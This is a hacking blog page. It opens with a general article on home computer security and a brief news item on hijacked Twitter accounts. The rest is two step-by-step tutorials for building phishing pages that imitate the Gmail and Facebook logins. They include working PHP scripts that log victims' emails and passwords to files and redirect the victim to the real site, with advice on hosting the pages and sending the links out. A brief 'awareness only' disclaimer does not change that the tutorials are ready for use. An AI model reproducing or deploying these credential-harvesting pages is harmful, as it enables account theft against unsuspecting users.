Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


Showing posts with label Twitter Phishing. Show all posts
Showing posts with label Twitter Phishing. Show all posts

Is My Computer Safe From Hackers


Is A Hacker Is Using Your Computer

A good friend of mine called me one day and told me his computer was running particularly slow and the odd thing was it was worse in the evening. I took a look at his computer and found that someone had got into it and was storing large (I mean Large) amounts of Pornography, Stolen Software, Music and Videos, on it. Most "Hackers" are not looking to do something to your computer that you will immediately be aware of. They are looking for what is called "staging areas" where they can store things for distribution or later use. Can you imagine how my friend felt once I showed him what was on his computer! This happens all the time. There are organizations out there who are paid by the Entertainment Industry, the Government, and other institutions who are looking for this type of issue. If they locate these things on your computer, trying to prove that you had nothing to do with it could be a pretty difficult thing to do.

Are My Computers Safe From Hackers? 

The meaning of the term "HACKER" has really changed over the years.  Early on anyone who was considered a "HACKER" was someone who new the intricate workings of computers and various technology.  Someone who was considered to be a guru at what they did whether it be a programmer who wrote software or someone who knew everything there was to know about a particular Operating System.  These day's the moment someone hears the word "HACKER" it conjures up many thoughts and images.  Some people imagine a teenager sitting home writing programs to break into business computers or their school.  Others may imagine someone who attempts to access online computer systems such as Banks or Stores to commit fraud and make off with millions of dollars.  The fact is, all the above are pretty much true images of a HACKER.  It just depends on who it applies to!

What Can Hackers Do?

A few years back I'm sure we all remember hearing or reading about what websites were defaced that given week.  This in itself can be embarrassing for the website owner and was very prevalent.  It's not that this sort of thing does not happen anymore but it is eclipsed but the more serious things that take place.  Banks being defrauded by unscrupulous employees, Online Stores having their patrons credit card information ripped off, and a host of other more serious actions.
The reality is that as network systems become more complex and widespread, the opportunities for those who wish to compromise or HACK computers become much greater.  Take a look at this Threat and Trend graphic.  It will layout just a few entry points and opportunities for hackers!
As a home or small business computer user there are many ways you could be at risk.  Many people store their financial information on their computers using a simple spreadsheet or document, or maybe something like Quicken / QuickBooks accounting.  Many people store all their logins and passwords in plain text documents on their computers.  How many people store information regarding their medical conditions on their computers.  Computers are there to make our lives more simple and provide us with a means to store all of our most important information.  What if this information were in the hands of someone else?  What could happen;
  • Is it possible for someone to assume my identity if they access the above information;
  • Can someone find out what all of my logins and passwords are;
  • As a business owner do I need to be concerned about corporate fraud;
  • Is it possible for a hacker to steal my companies intellectual property;
  • Can an unauthorized person access my company's sales information including clients and prospects;
  • And, as a home user, or small business owner, could I be held liable for something someone else does with my computer?
The answer to all the above is, yes!  If your computers are not properly configured, kept up-to-date with patches, or secured against the most common types of attacks you are at risk!
Take a look at the following Threat Spectrum to get an idea of the potential risks!
There are new vulnerabilities for computers found almost everyday.  If you are not diligent in keeping your computers up to date and secured you can expect (it's just a matter of time), that in one way or another your system will be compromised.
Over the years, we have seen just about everything under the sun when performing small, medium, or large computer security assessments;
  • Home computers being used to relay information and stolen software;
  • Business computers being used to store stolen software as well as distributing it;
  • Employees using their work computers to run businesses such as pornography sites;
  • Ex-employees still accessing their work computers because of the lack of security;
  • People trying to extort or intimidate others using information they gathered from unsecured computers;
  • The potential for civil and criminal legal action against users for participating in malicious tasks;
and that's just to name a few of the things we have seen!
Don't underestimate what can happen to you.  Human beings are very risk adverse however we are also very bad at determining the real risks.  Many people are afraid to fly in planes but have no qualms about climbing up a 10 foot later to change old ceiling fan without cutting the electricity first. You have more of a chance climbing that ladder, getting shocked, falling and breaking your neck than going down on a plane. This seems to apply to many methods of analyzing risks.
Think about this. In testing where we placed out-of-the-box computers on the Internet it takes approximately 15 to 30 minutes before it's hacked or compromised in some way or another.

How Do Hackers Do it?

Although this section of this article could be a book in itself (and will be), hackers have many tools available to them to perform their tasks.  Many of these tools are available free on the Internet.  You just need to know what you are looking for and where to look for it.
When hackers find new ways to break into computers or defeat certain security measures they will often write automated tools they can then use and distribute to other hackers.  Again, many of these tools are available on the Internet and just about anyone can use them.
In many cases, because of the lack of security, many hackers don't need special tools to access your computer.  The Operating System and the commands that are available may be all the hacker needs to remotely access your computer.
Remember, although it is not possible to configure most systems to be 100% secure, there are many steps that you can take, some simple and others drastic, to create a deterrence.  Hackers, unless they have the motivation, no limit on time, and no limit on cash, will typically search for the easiest target!
Don't give them the opportunity!

Why Should I be Concerned?

As you can see above, there are many reasons to be concern.  As a home user or small business, you should be diligent and protect yourself.  This does not mean that you should consume yourself with these efforts.  You should be diligent in your actions.  Taken even the most basic actions to secure your computers can help.
  • Protect information about your identity;
  • Use strong passwords when setting up user accounts;
  • Change your passwords on a frequent basis and don't give them out to anyone;
  • Update you computers Operating System with patches;
  • Install Anti-Virus software and keep it up-to-date;
  • If you do not have a hardware Firewall install a personal Firewall (The latest versions of Windows XP has a basic Firewall built in);
  • Install Anti-Adware / Spy-ware software and keep it up-to-date;
  • Don't assume that since the computer you use at home is just a home computer that you don't need a password to access it.  Especially if you are using Wireless Networking (That's a whole other story).

Conclusion

As you can see, everyone should be concerned about securing there computers against the potential of compromise of being hacked.  Believe me, you don't want to find yourself trying to figure out what to do next once your system has been compromised.  It is not a pleasant experience.

Twitter accounts hacked : Barack Obama, Britney etc on the list

According to twitter, a micro blogging site, 33 twitter accounts were compromised and false and inappropriate messages were posted online. Hacked accounts include prominent twitter sources like President-elect Barack Obama, Rick Sanchez, Britney Spears, Fox News etc.
It’s believed that accounts were compromised after a hacker accessed tools of the support team used to reset their login info.
Accounts were fixed quickly by resetting passwords.
About twitter
Twitter is a micro blog site that allows users to send status updates (tweets) from mobile phones, instant messaging than 140 characters.

How to make phishing pages for gmail,orkut,facebook

I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for various sites like gmail or orkut.For making Phishing page for any site you need 3 types of files in common.They are

1) .Html file ( ie fake page )

2) .php file or any other action script page ( for tracking the details that  entered in page created by you )

3) .Txt file ( To save all the details in text format )


In common,every phishing page contains these 3 files,But normally you can see only the fake page which looks exactly as original,remaining files will run in background that will not be visible for you.Here I am going to create a phishing page for gmail login.Procedures for creating phishing pages for all sites are same.I am giving you detailed instructions for making this page,Just follow my steps exactly as i mentioned.

STEPS FOR CREATING PHISHING PAGE.

1 ) First goto Gmail login page ( www.gmail.com,make sure that the page is loaded completely ) and right click and select view source ( in firefox ) or view source code option in other browsers.

2 ) Select all ( CTR + A ) and copy all the code and paste it in notepad.

3 ) Then search for the keyword action.You can see the code as given below.





4 ) Just change the above code as mentioned below






after changing to mail.php ( or anyname.php ) just save it in the form login.html ( anyname.html ). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.


5 ) For creating a php script,just copy the below php code into notepad and save in the format mail.php (  name mentioned in action of our phishing page )

<?php
header ('Location: http://www.gmail.com ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

6 ) By this step our PHP script is also ready,Now create a .Txt file with name log.txt ( name mentioned in php script )

7 ) Now host these 3 files ie,
login.html

mail.php

log.txt

in any of free hosting servers like ripway,drivehq,100 mb etc (or any other,just google free hosting ).Make sure that these 3 files are in same directory.

8 ) After hosting you will get a direct link to your phishing page,that is to your login.html page.just use this link to access or send phishing page.


HOW PHISHING IS WORKING

When you enter your username and password in gnail login phishing page and click singin or hit enter the mail.php script is loaded and this will copy all the entered details in to your log.txt file.Since we are given www.gmail.com as the header location original gmail page will be loaded after the php script.So the victim will think that they entered wrong information.If victim is already logged in gmail,then their mail will be loaded.


You can also read this HOW TO CREATE PHISHING PAGES FOR FACEBOOK

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.thehackerclub4u.tk will not be responsible for any such phishing attacks,KNOW HACKING BUT NO HACKING....

If you found anything useful in this article please pass your comments,All your feedbacks are precious...............

Latest Facebook phishing page and script

Hi friends, this is our latest article regarding Facebook Phishing attack and we are so glad to announce that we have developed some new phishing script for Facebook which is working 100 %.We have already discussed what is phishing and how to create phishing pages for Gmail, Orkut etc. I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for Facebook.For making Phishing page for any site you need 3 types of files in common.They are

  • .Html file ( ie fake page )
  • .Php file or any other action script page (for tracking the details that entered in page created by you)
  • .Txt file ( To save all the details in text format )
HOW TO MAKE FACEBOOK PHISHING PAGE

1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.

2. Select all ( CTR + A ) and copy all the code and paste it in notepad.

3. Then search(CTR + F) for the keyword action.You can see the code as given below.

action="https://www.facebook.com/login.php?login_attempt=1"

4. Just change the above code as mentioned below

action="pass.php"

after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.

5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘

6.  By this step our PHP script is also ready,

7.  Now host these 2 files ie,
  • facebook.html
  • pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.

8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.

9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.thehackerclub4u.tk will not be responsible for any such phishing attacks.

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More